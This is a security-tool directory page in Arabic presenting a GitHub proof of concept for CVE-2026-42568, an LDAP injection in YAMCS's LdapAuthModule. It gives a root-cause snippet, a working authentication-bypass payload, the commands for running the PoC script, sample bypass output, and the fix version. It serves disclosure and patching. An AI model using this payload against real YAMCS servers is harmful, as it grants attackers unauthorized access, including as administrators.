Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-42568 — توجد ثغرة حقن LDAP في org.yamcs.security.LdapAuthModule. يتم إدراج معلمة اسم المستخدم مباشرة في مرشحات بحث LDAP دون ترميز RFC 4515، مما يسمح بتجاوز المصادقة. | Kitploit
أدوات/GitHubGitHub/ex-cal1bur/cve-2026-42568
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHubex-cal1bur/cve-2026-42568

CVE-2026-42568

توجد ثغرة حقن LDAP في org.yamcs.security.LdapAuthModule. يتم إدراج معلمة اسم المستخدم مباشرة في مرشحات بحث LDAP دون ترميز RFC 4515، مما يسمح بتجاوز المصادقة.

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-42568 — حقن LDAP في LdapAuthModule في YAMCS

ملخص

توجد ثغرة حقن LDAP في org.yamcs.security.LdapAuthModule. يتم إدخال اسم المستخدم مباشرة في مرشحات بحث LDAP دون هروب RFC 4515، مما يسمح بتجاوز المصادقة.

الحقلالقيمة
CVECVE-2026-42568
الخطورةMEDIUM
CWECWE-90: تحييد غير صحيح للعناصر الخاصة في استعلام LDAP
المتأثرyamcs-core < 5.12.7 (مع تكوين مصادقة LDAP)
الإصلاح فيyamcs-core 5.12.7
الإعلانGHSA-cqh3-jg8p-336j

تفاصيل الثغرة

السبب الجذري (LdapAuthModule.java):

root@kitploit:~
var filter = userFilter.replace("{0}", username);
// username inserted directly — no RFC 4515 escaping

مع userFilter نموذجي مثل (uid={0})، يقوم اسم مستخدم ضار بتدمير بنية المرشح:

root@kitploit:~
Input:  *)(uid=*))(|(uid=*
Filter: (uid=*)(uid=*))(|(uid=*)
Result: Universal match — authentication bypassed

إثبات المفهوم

root@kitploit:~
pip install requests
python3 poc.py http://localhost:8090

المخرج المتوقع على نسخة قابلة للاختراق (مع تكوين LDAP):

root@kitploit:~
[1] Universal bypass (any account)
     Username: *)(uid=*))(|(uid=*
     Password: anything
     Result:   HTTP 200
     [!!!] AUTHENTICATION BYPASSED
     [!!!] Token received: eyJhbGciOiJSUzI1NiJ9...

ملاحظة: تؤثر هذه الثغرة فقط على حالات YAMCS التي تم تكوين LdapAuthModule فيها. التثبيتات الافتراضية التي تستخدم المصادقة المدمجة غير متأثرة.

التأثير

يمكن لمهاجم غير مصادق يمكنه الوصول إلى خادم YAMCS تجاوز المصادقة بالكامل عند تكوين LDAP، والحصول على وصول كمستخدم عشوائي بما في ذلك المسؤولين.

الإصلاح

قم بالترقية إلى yamcs-core >= 5.12.7. يطبق الإصلاح هروب RFC 4515 على اسم المستخدم قبل إنشاء عامل تصفية LDAP.

الجدول الزمني

التاريخالحدث
2026-05تم الإبلاغ عن الثغرة
2026-05-26تم إصدار الإصلاح في yamcs-core 5.12.7
2026-05-26تم نشر الإعلان العام

الباحث

Daniel Miranda Barcelona (Excal1bur)

  • GitHub: https://github.com/ex-cal1bur
  • LinkedIn: https://linkedin.com/in/daniel-miranda-barcelona
  • Blog: https://thedumpster.es
تنزيل الأداة